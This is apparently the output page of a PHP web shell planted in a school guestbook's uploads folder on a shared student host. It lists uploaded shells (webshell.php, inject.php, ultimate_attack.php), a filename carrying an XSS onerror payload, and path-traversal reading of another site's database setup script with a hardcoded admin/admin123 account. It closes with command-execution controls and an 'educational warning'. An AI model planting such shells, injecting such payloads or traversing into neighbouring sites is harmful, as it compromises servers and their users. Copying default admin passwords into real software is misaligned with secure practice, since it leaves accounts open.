🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ./../../../../585871.klas4s23.mid-ica.nl/public_html/grotevriendelijkereus/setup_database.php

<?php
// Setup the database tables

require_once 'includes/classes/Databases.php';

$db = Database::getInstance();
$pdo = $db->getPDO();

// Drop existing tables to ensure clean setup
$pdo->exec("DROP TABLE IF EXISTS task_assignments");
$pdo->exec("DROP TABLE IF EXISTS tasks");
$pdo->exec("DROP TABLE IF EXISTS activity_logs");
$pdo->exec("DROP TABLE IF EXISTS users");

// Create users table
$pdo->exec("
CREATE TABLE IF NOT EXISTS users (
    id INT AUTO_INCREMENT PRIMARY KEY,
    first_name VARCHAR(50) NOT NULL,
    last_name VARCHAR(50) NOT NULL,
    email VARCHAR(100) NOT NULL UNIQUE,
    password_hash VARCHAR(255) NOT NULL,
    role ENUM('admin', 'volunteer') DEFAULT 'volunteer',
    is_approved TINYINT(1) DEFAULT 0,
    reset_token VARCHAR(100) NULL,
    reset_expires DATETIME NULL,
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
)");

// Create tasks table
$pdo->exec("
CREATE TABLE IF NOT EXISTS tasks (
    id INT AUTO_INCREMENT PRIMARY KEY,
    title VARCHAR(100) NOT NULL,
    description TEXT,
    date DATE NOT NULL,
    end_date DATE NULL,
    start_time TIME NOT NULL,
    end_time TIME NOT NULL,
    location VARCHAR(100) NOT NULL,
    volunteers_needed INT NOT NULL DEFAULT 1,
    is_recurring TINYINT(1) DEFAULT 0,
    recurring_series_id VARCHAR(50) NULL,
    recurrence_type ENUM('daily', 'weekly', 'monthly') NULL,
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
)");

// Create task assignments table
$pdo->exec("
CREATE TABLE IF NOT EXISTS task_assignments (
    id INT AUTO_INCREMENT PRIMARY KEY,
    task_id INT NOT NULL,
    user_id INT NOT NULL,
    status ENUM('pending', 'confirmed', 'rejected') DEFAULT 'confirmed',
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
    FOREIGN KEY (task_id) REFERENCES tasks(id) ON DELETE CASCADE,
    FOREIGN KEY (user_id) REFERENCES users(id) ON DELETE CASCADE,
    UNIQUE KEY unique_assignment (task_id, user_id)
)");

// Create activity logs table
$pdo->exec("
CREATE TABLE IF NOT EXISTS activity_logs (
    id INT AUTO_INCREMENT PRIMARY KEY,
    user_id INT,
    action VARCHAR(50) NOT NULL,
    description TEXT,
    ip_address VARCHAR(45),
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    FOREIGN KEY (user_id) REFERENCES users(id) ON DELETE SET NULL
)");

// Create default admin user if it doesn't exist
$checkAdmin = $pdo->query("SELECT COUNT(*) FROM users WHERE role = 'admin'")->fetchColumn();

if ($checkAdmin == 0) {
    $passwordHash = password_hash('admin123', PASSWORD_DEFAULT);
    $pdo->exec("INSERT INTO users (first_name, last_name, email, password_hash, role, is_approved) 
                VALUES ('Admin', 'User', 'admin@degoudenschoen.nl', '$passwordHash', 'admin', 1)");
    echo "Default admin user created: admin@degoudenschoen.nl / admin123";
}

// Create sample tasks
$taskCount = $pdo->query("SELECT COUNT(*) FROM tasks")->fetchColumn();
if ($taskCount == 0) {
    // Create some sample tasks
    $sampleTasks = [
        [
            'title' => 'Kantinedienst',
            'description' => 'Help met het serveren van drankjes en snacks in de kantine tijdens de wedstrijden. Je werkt samen met een ervaren kantinemedewerker en zorgt voor een gezellige sfeer.',
            'date' => date('Y-m-d', strtotime('+3 days')),
            'start_time' => '14:00:00',
            'end_time' => '18:00:00',
            'location' => 'Clubhuis',
            'volunteers_needed' => 2
        ],
        [
            'title' => 'WedstrijdcoΓΆrdinatie',
            'description' => 'Zorg voor een soepel verloop van de wedstrijden. Ontvang bezoekende teams, wijs kleedkamers toe en houd het wedstrijdschema in de gaten.',
            'date' => date('Y-m-d', strtotime('+5 days')),
            'start_time' => '09:00:00',
            'end_time' => '13:00:00',
            'location' => 'Veld 1',
            'volunteers_needed' => 3
        ],
        [
            'title' => 'Schoonmaakploeg',
            'description' => 'Help mee om de kleedkamers en kantine schoon te maken na een drukke wedstrijddag.',
            'date' => date('Y-m-d', strtotime('+7 days')),
            'start_time' => '18:00:00',
            'end_time' => '20:00:00',
            'location' => 'Clubhuis en kleedkamers',
            'volunteers_needed' => 4
        ]
    ];
    
    $stmt = $pdo->prepare("INSERT INTO tasks (title, description, date, start_time, end_time, location, volunteers_needed) 
                          VALUES (?, ?, ?, ?, ?, ?, ?)");
    
    foreach ($sampleTasks as $task) {
        $stmt->execute([
            $task['title'],
            $task['description'],
            $task['date'],
            $task['start_time'],
            $task['end_time'],
            $task['location'],
            $task['volunteers_needed']
        ]);
    }
    
    echo "<br>Sample tasks created.";
}

echo "<br>Database setup completed successfully!";

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!